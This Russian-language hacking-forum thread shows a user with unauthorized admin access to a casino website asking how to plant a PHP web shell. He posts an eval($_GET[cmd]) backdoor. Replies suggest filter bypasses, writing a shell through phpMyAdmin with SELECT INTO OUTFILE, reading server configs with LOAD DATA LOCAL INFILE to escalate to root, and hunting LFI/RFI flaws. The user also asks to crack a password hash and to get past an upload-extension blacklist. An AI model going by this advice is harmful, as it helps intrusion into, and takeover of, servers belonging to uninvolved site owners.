Помощь по заливке шела

Discussion in 'Песочница' started by zifus, 7 Nov 2015.

  1. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    Помогите! Есть доступ к админке казино при добавлении новости, а я туда пихаю шел происходит вот что [​IMG]
    Может можно как то раскрутить? Есть доступ к phpmyadmin.
    Подскажите куда копать?
     
  2. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    У вас шелл залился, но интерпретируется как тектовый файл, а следовательно и не выполняется.
     
    _________________________
    Echnaton likes this.
  3. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    А можно решить эту проблему или это все?
     
  4. Echnaton

    Echnaton Member

    Joined:
    14 Feb 2013
    Messages:
    75
    Likes Received:
    55
    Reputations:
    5
    Проверьте наличие открывающего <?php тега в начале и закрывающего тега ?> в конце файла
     
  5. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    [​IMG]

    В общем вставил в новость <?php eval($_GET[cmd]); ?> На странице не отображается, а в самом коде есть но закоментировано как я понимаю.
    Пробовал просто <> ставить показываются, а добавляю знак ? вот так <?> становится <!--?-->
    Вопрос может можно закодировать как-то ?
     
  6. GreenGO

    GreenGO Member

    Joined:
    2 May 2013
    Messages:
    434
    Likes Received:
    53
    Reputations:
    2
    А обфускацию пробовал?
     
  7. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    В обфускация все ровно начинается с <?
    Там экранируется <? если отдельно < или ? то нормально. нужно как то обойти фильтрацию
     
  8. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    а в phpmyadmin прав на запись нет?
     
  9. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Найди место, где можно заливать файлы.
    Пробуй разные шеллы, php,shtml,phtml ......

    Либо найди путь и через PMA
    select 'php code' into outfile /path/path/path/1.php
     
    _________________________
  10. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    В PMA нет прав.
     
  11. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    попробуй <script language="php"> или <?= или пхп тег не закрывай
    проверь сначала как фильтр работает
     
  12. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Попробуй load data local infile, если сработает, то прочитай конфиг mysql и зайди из под рута.
     
    _________________________
  13. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    /* Optional: User for advanced features */
    // $cfg['Servers'][$i]['controluser'] = 'pma';
    // $cfg['Servers'][$i]['controlpass'] = 'pmapass';
    Дорыл уже к конфигу PMA.
    Да в общем могу любой файл прочитать на сервере..А толку 0. Не могу найти файл чтобы зайди из под рута.
     
  14. Waki

    Waki Member

    Joined:
    9 Oct 2015
    Messages:
    55
    Likes Received:
    31
    Reputations:
    10
    Как конфиг mysql даст возможность зайти под рутом?
     
  15. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    Друзья.. Дайте масла для мозга, руки опускаются.. В load data local infile не хватает прав прочитать конфиг. Может еще есть какие то способы? Есть phpinfo.php может оно даст что то?
     
  16. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    В phpinfo смотри директорию веба, и сливай исходники, ищи пхп иньекции LFI/RFI и прочее подобное. Посмотри файл который новость добавляет как в нем реализовано это.
    Да кстати, найди свою новость, с пхп кодом, в БД через phpmyadmin, посмотри может там прям в базе сохранено с комментарием, попробуй раскомментировать и выполнить. ( ты говорил что новость в базу пишется )
     
    _________________________
  17. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    Помогите вернуть в нормальное состояние
    $1$kEp4dcbi$.Yd5hZ/LV548VspBMyeHF/
    Как я понял это md5(unix), может кто знает как его декрипнуть?
     
  18. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    PHP:
    $set['attachments']['allowed_types'] = isset($_POST['s_allowed_types']) && ! is_array($_POST['s_allowed_types']) && strlen($_POST['s_allowed_types']) ? explode(','strtolowerpreg_replace('/[^a-zA-Z0-9,]/'''$_POST['s_allowed_types']) ) ) : array();
        
    $set['attachments']['allowed_types'] = array_diff($set['attachments']['allowed_types'], array('php''php4''php3''php5''phps''phtml''shtml''shtm''cgi''pl') );
    На сервере нашел еще сайт на нем установлен Help Desk Software HESK suport
    получил доступ к админке там есть upload но не пропускает PHP файлы. Это видно из кода.
    Еще я могу сам задавать расширения файлов которые можно заливать, кроме php. С .htaccess дело не проходит.
    Что можно еще туда запихнуть?
     
Loading...